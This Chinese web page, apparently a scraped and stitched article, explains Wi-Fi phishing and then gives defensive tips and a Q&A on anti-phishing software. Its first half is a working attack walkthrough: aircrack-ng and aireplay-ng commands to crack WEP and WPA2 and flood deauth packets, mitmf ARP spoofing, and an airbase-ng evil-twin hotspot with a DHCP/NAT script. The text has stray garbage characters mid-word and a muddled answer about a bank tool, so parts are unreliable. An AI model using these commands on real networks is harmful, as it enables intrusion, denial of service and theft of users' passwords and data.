wifi钓鱼工具_wifi钓鱼攻击软件

怎么用wifi做钓鱼

用wifi做钓鱼先用笔记橘败兄本本地搭建了枯亩一个wifi，然后使用我们的嗅探软件wireshark，配置需要嗅探的接口，接口就选择伪造的wifi接口，过滤掉不需要的信息，只需要重要的数据。

网络钓鱼攻击者利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动，受骗者往往会泄露自己的财务数据，如信用卡号、帐户用户名和口令等内容。诈骗者通常会将自己伪装成知名银行、在线零售商和信用卡公司圆袭等可信的站点，在所有接触诈骗信息的用户中，有高达5%的人都会对这些骗局做出响应。

怎么攻击别人wifi？

1.保密性

我们攻击WIFI的第一个思路就是从保密性出发，我们希望从无线系统中获取用户的明文数据。首先，我们知道WIFI的的认证加密主要有以下四种方式：OPEN（无加密）、WEP（RC4）、WPA（TKIP）、WPA2（CCMP）。

OPEN的WIFI没有采取认证加密措施，任意用户均可链接WIFI，用户数据在BSS（基本服务集）中明文传输，恶意用户没有任何门槛就可连接，然后通过中间人攻击即可获取用户的数据（SSL、SSH等需要其他工具）。如下图所示：

WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码，然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了，WEP抓取IVS包，WPA/WPA2抓取handshake包。

WEP大概如下：

airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包

aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs

aircrack-ng /workspace/sniff/airmon02.ivs

WPA/WPA2大概如下：

airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据，抓取handshake包

aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包，更快的获取handshake

aircrack-ng -w 你的字典文件备老盯 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码

密码破解成功后即可连接AP，通过中间人的方式获取用户仿和明文数据，或者直接用wireshark抓取加密包，然后通过airdecap-ng工具解密，然后用wireshark读取已经解密的数据包。

破解WPA、WPA2不一定成功，取决于你字典是否强大，此时我们可以想办法诱骗用户主动输入WIFI密码，比如我们创建一个和目标AP具有同样ESSID的软AP，用户可以连接上，单在浏览网页时会弹出一个虚假的认证页面，告诉用户必须输入WIFI的密码，用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。

wifiphisher将用户输入的密码当做WIFI的密码，但此密码并没有去验证，如果用户输入错误，也会提示出该密码。

而fluxion会将用户输入的密码与handshake校验，成功方认为获取到密码。

2.可用性

通过使目标用户无法使用WIFI来破坏无线系统的可用性，通常通过DOS攻击来实现，比如发送大量的deauth包来迫使用户station与AP解除认证、连接。

aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包，迫使目标station无法连接AP

mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接，从而耗尽AP的资源造成DOS攻击

3.真实性

（1）恶意用户进入无线系统后，可通过中间人攻击获取或修改用户数据。

ARP欺骗或DNS欺骗，ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。

mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet

通过driftnet工具抓取目标浏览网页含桐时的图片

driftnet -i wlan0

当然还可以利用中间人攻击做很多事情，比如获取cookie，嵌入js，结合beef进一步攻击等等。。。

（2）伪造AP进行钓鱼攻击

airbase -ng -e airmon wlan1mon #创建钓鱼热点

然后通过下面的脚本开启dhcp服务器（必须先安装isc-dhcp-server），开启路由，开启系统转发，开启防火墙nat等。

1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点，并可以上网，但此时可以通过嗅探at0网卡获取用户数据。

4.完整性

篡改用户数据，在WIFI攻击这块貌似用处不大。

5.不可抵赖性

怎么知道自己连的wifi是不是钓鱼wifi，怎么防范？

1、安装腾讯手机管家软件并开启氏斗监控能。当手机管家提示wifi有风险时尽量不要急着连接使用。腾讯手机管家会检测出包括钓鱼wifi在内的风险而提示。虚假WiFi钓鱼是当前免费WiFi的主要安全风险,。黑客盗取用户隐私的主要方法就是利用了虚假WiFi钓鱼的手法。因此防范wifi钓鱼是必要的。

2、防范钓鱼wifi的措施：

（1）谨慎使用公共场合的WIFI热点。官方机构提供的而且有验证机制的WiFi，可以找工作人员确认后连接使用。其他可以直接连接且不需要验证或密码的公共WiFi风险较高，背后有可能是钓鱼陷阱，尽量不使用。

（2）使用公共场合的WIFI热点时，尽量不要进行网络购物和网银的操作，避免重要的个人敏感信息遭到泄露，甚至被黑客银行转账。

（4）养成良好的WIFI使用习惯。手机会把使用过的WIFI热点都记录下来，如果WiFi开关处于打开状态，手机就会不断向周边进行搜寻，一旦遇到同名的热点就会自动进行连接，存在被钓鱼风险。因此当我们进入公共区歼慎磨域后，尽量不要打开WIFI开关，或者把WiFi调成锁屏后不再自动连接，避免在自己不知道的情况下连接上恶意WIFI。

（4）家里路由器管理后台的登录账户、密码，不要使用默认的admin，可改为字母加数字的高强度密码；设置的WIFI密码选择WPA2加密认证方式，相对复杂的密码可大大提高黑客破解的难度。

（5）不管在手机端还是电脑端孝歼都应安装安全软件。对于黑客常用的钓鱼网站等攻击手法，安全软件可以及时拦截提醒。日前，腾讯安全携手迈外迪、光音网络、维盟、潮Wi-Fi等商用Wi-Fi服务提供商，成立“腾讯安全Wi-Fi联盟”。为了方便用户上网，装有腾讯手机管家的手机能够自动搜索和连接识别为安全的Wi-Fi热点，实现一键连接。腾讯手机管家还开放安全能力，使得腾讯安全Wi-Fi联盟提供真假热点识别、数据传输加密保护、DNS保护三大专业保障来为用户提供上网安全。

防钓鱼软件是什么

问题一：防钓鱼软件是什档誉么？ 防止钓鱼网站的软件，就是防盗号，盗取密码的软件

问题二：防钓鱼软件哪种最好 “背影盒子”这款防钓鱼软件很不错，尤其是在网银付款方面，这个软件有个功能叫“未付，先知”，在打开网银付款页面后，可以知道这笔付款的收款人是谁，然后再决定是否付款

问题三：工商银行防钓鱼软件是什么软件？ 你安装后，一、任何网页打不开。如果您未安装这一控件，在打开任何网页之前，会被提示“工商银行防钓鱼软件……”，提示你安装。这时，你点“否”，就可以登陆您要访问的网页了。可是，如果您曾经安装过，就会莫名其妙地卡一段时间，然后，才以极其缓慢的速度打开该网页。二、任务管理器无法启用。按复合键之后，虽然任务管理器的图标会出现在工具栏，但是，任务管理器无法弹出显示到桌面（即无法前置）。这等于说，一旦遭遇这种情况，您的电脑就等于已经瘫痪，无法继续使用。至少，在仍然开机的情况下，是无法继续用电脑工作的。三、工具栏无法点选。工具栏无法再点选操作，这是电脑瘫痪的一大重要特征。四、腾讯、阿里旺旺、百度hi、MSN、雅虎通等一切聊天工具均不能成功登陆，相关聊天记录文件被破坏！总之，这个由中国工商银行正式发布的所谓工商银行反钓鱼软件，并不存在假冒的，请大家再次遇到时，不要点安装，这样，才能保证电脑的正常运行！

问题四：中国工商银行防钓鱼软件，是什么东西呀？ 防钓鱼软件,就是防止假的网站,冒充工行念禅等网上银行,让用户不会受骗

问题五：手机装什么软件防钓鱼网站 腾讯手机管家或百度手机卫士

问题六：如何设置防钓鱼软件 防钓鱼软件一般都不用专门设置，只要保持软件的正常工作就可以了，防钓鱼软件一般都是采用黑、白名单方式来检测网址的正确与否，所以注意要及时更新；同时防钓鱼软件也多采用的访问控制的方法，就是通过它内置的访问链接来进行相关网站的访问，这种方法是保证你打开的是正确的网址。

问题七：中国工商银行防钓鱼软件是干什么用的？可不可以卸载？ 银行类安全软件最好是别卸载，这些安全插件不会占用你太多空间的。

如果你没有该银行的业务，可以放心卸载。

通过腾讯电脑管家的插件清理功能就能正常卸载。

打开腾讯电脑管家~~~~工具箱~~~~清理插件~~~~勾选后即可清除

问题八：什么软件防钓鱼效果好，或是浏览器也行 虽然现在主流的浏览器都具有防钓鱼功能，但是都不能百分之百地检查出钓鱼式欺骗网站。目前对付钓鱼欺诈没有技术上的解决方案， 用户只有自己小心。下面是网上的一些建议：1、提高警惕，不登录不熟悉的网站，键入网站地址的时候要校对，以防输入错误误入狼窝，细心就可以发现一些破绽。 2、不要打开陌生人的电子邮件，更不要轻信他人说教，特别是即时通讯工具上的传来的消息，很有可能是病毒发出的。 3、安装杀毒软件并及时升级病毒知识库和操作系统（如Windows）补丁。 4、将敏感信息输入隐私保护，打开个人防火墙。 5、收到不明电子邮件时不要点击其中的任何链接。登录银行网站前，要留意浏览器地址栏，如果发现网页地址不能修改，最小化IE窗口后仍可看到浮在桌面上的网页地址等现象，请立即关闭IE窗口，以免账号密码被盗。 查看原帖

问题九：有没有什么免费的杀毒软件能防钓鱼网仔蠢尘站的？ 您好：

腾讯电脑管家就能防钓鱼网站的，腾讯电脑管家是采用“ 4+1 ”核“芯”杀毒引擎的专业杀毒软件，还有清理垃圾、电脑加速、修复漏洞、软件管理、电脑诊所等电脑管理功能，您可以点击这里下载最新版的腾讯电脑管家：最新版腾讯电脑管家下载

如果有其他问题，欢迎继续到电脑管家企业平台提问

问题十：有什么软件可以防范钓鱼wifi吗？ 是不是担心连接免费wifia的时候连到钓鱼wifi？这个你可以用腾讯手机管家，打开管家管理页――免费wifi――显示附近存在的wifi，你可以点击后面的小点点看信号强度和加密方式，或者直接一键安全连接。而且管家还支持在地图中查找更多免费wifi，并且在wifi联网前可以进行安全性检测，包括是否被监听、是否会跳转到钓鱼网站、是否为假冒伪劣的公共wifi、是否存在泄密风险等等，感觉很安全。

标签：wifi钓鱼攻击软件